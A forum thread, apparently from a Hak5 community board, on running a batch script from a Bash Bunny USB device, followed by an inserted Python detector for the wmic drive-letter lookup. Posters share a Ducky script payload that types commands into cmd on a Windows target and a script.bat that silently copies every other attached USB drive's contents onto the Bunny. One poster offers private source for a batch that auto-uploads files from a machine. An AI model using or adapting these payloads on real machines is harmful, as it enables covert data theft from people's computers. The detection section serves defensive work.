How run batch file


Natha_n

There is no command in Ducky script that I know of that can start a batch script on a Windows host. I guess that you want to store the batch script file that you have posted in the other thread on the Bunny, but you want to execute it from the perspective of the Windows target machine. In other words, the Windows target PC should start the bat file from the Bunny storage. To do this you need to get the drive letter of the Bunny (the way I showed you in the other thread), but not using PowerShell since that's a limitation in your target system. This is possible to do without PowerShell if using wmic. It's not that pretty, but it works.

Link to comment
Share on other sites

If the batch can be executed in one single line, then you can execute cmd.exe /c
---------------

This I know: the folks at hak5.org don't know this trick, but you can execute a batch that will automatically upload files from the machine, or execute a batch to get as much data as you can. (I have the source) PM me.

Link to comment
Share on other sites

I wrote the payload.txt and the script.bat. Can you tell me if they are correct? For the payload I don't know how to use the switch position (I got it but I didn't use it after).

payload.txt

DUCKY_LANG us
GET SWITCH_POSITION
LED ATTACK
ATTACKMODE HID STORAGE
GUI
DELAY 100
STRING cmd.exe
ENTER
DELAY 100
STRING for /f "tokens=2 delims==" %b IN ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') DO SET letter_BashBunny=%b
ENTER
STRING %letter_BashBunny%
ENTER
STRING cd %letter_BashBunny%\payloads\
ENTER
STRING start /min script.bat
ENTER
STRING exit
ENTER
LED FINISH

script.bat

@echo off
MKDIR %~dp0\copy_directory
FOR /F "tokens=2 delims==" %%u IN ('wmic volume where "drivetype=2 and label<>'BashBunny'" get driveletter /format:list') DO (
    SET usb_key=%%u
    XCOPY /C /Q /G /Y /E "%usb_key%" "%~d0\copy_directory\"
)

Thanks for your replies!

Link to comment
Share on other sites

  • 4 weeks later...

Hi,
After many attempts and a lot of reading on the subject, I don't understand why my payload does not work.
Everything runs normally until you type the command in the cmd.

command:

Q STRING for /f "tokens=2 delims==" %b in ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') do set letter_BashBunny=%b

 

If I do another command like cls it works.
Do you have an idea?

ATTACKMODE HID STORAGE
LED R
Q GUI
Q DELAY 100
Q STRING cmd.exe
Q ENTER
Q DELAY 100
Q STRING for /f "tokens=2 delims==" %b in ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') do set letter_BashBunny=%b
Q ENTER
Q DELAY 5
Q STRING %letter_BashBunny%
Q ENTER
Q DELAY 5
Q STRING cd %letter_BashBunny%\payloads\
Q ENTER
Q DELAY5
Q STRING start /min script.bat
Q ENTER
Q DELAY 5
Q STRING exit
Q ENTER
LED G

 

Link to comment
Share on other sites
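
From the defender's side, the drive-letter lookup used in this thread appears in process-creation logs as a wmic.exe command line. The following is an added example (not code from any poster in this thread) that flags such lookups; the sample records are constructed, and the record field names and the availability of command-line logging (for example Sysmon Event ID 1) are assumptions.

```python
import re

# Constructed process-creation records (hypothetical field names); not real logs.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic  volume where \"Label='BashBunny' and DriveType=2\" get DriveLetter /format:value"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic volume where \"drivetype=2 and label<>'BashBunny'\" get driveletter /format:list"},
    {"image": r"C:\Windows\System32\wbem\WMIC.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "wmic volume get Name,Capacity"},
    {"image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# wmic volume where "<conditions>" get <properties> [/format:...]
WHERE_RE = re.compile(r'\bvolume\s+where\s+"([^"]*)"\s+get\s+([\w,\s]+?)(?:\s+/|$)', re.I)
# One condition: field, operator, then a quoted or bare value.
COND_RE = re.compile(r"(\w+)\s*(<>|!=|=)\s*(?:'([^']*)'|(\S+))")

def parse_volume_query(cmdline):
    """Parse a wmic volume WHERE query into conditions and requested properties, else None."""
    m = WHERE_RE.search(cmdline)
    if not m:
        return None
    conds = {f.lower(): (op, quoted or bare)
             for f, op, quoted, bare in COND_RE.findall(m.group(1))}
    props = [p.strip().lower() for p in m.group(2).split(",") if p.strip()]
    return {"conds": conds, "get": props}

def detect(events):
    """Flag wmic.exe runs that resolve a removable volume's drive letter by its label."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith("\\wmic.exe"):
            continue
        q = parse_volume_query(ev["cmdline"])
        if not q or "driveletter" not in q["get"]:
            continue
        removable = q["conds"].get("drivetype") == ("=", "2")  # 2 = removable disk
        label = q["conds"].get("label")
        if removable and label:
            hits.append({"label": label[1], "op": label[0], "parent": ev["parent"]})
    return hits

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

Both the equality form from payload.txt and the `<>` form from script.bat are reported, while the plain `wmic volume get` inventory query is not.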

The Ducky script documentation is a bit scattered around according to me. If you use the Croc, that also uses Ducky script, it's a bit easier to find since you most often remember that you have seen it somewhere. Payloads on GitHub may also be a source of knowledge.

The Croc documentation has some info about escaping chars, not complete though as I see it, but always something.

https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands

Other than that, it's all about trying. Trial and error has worked before in computing history and is still alive as a working method.

Link to comment
Share on other sites
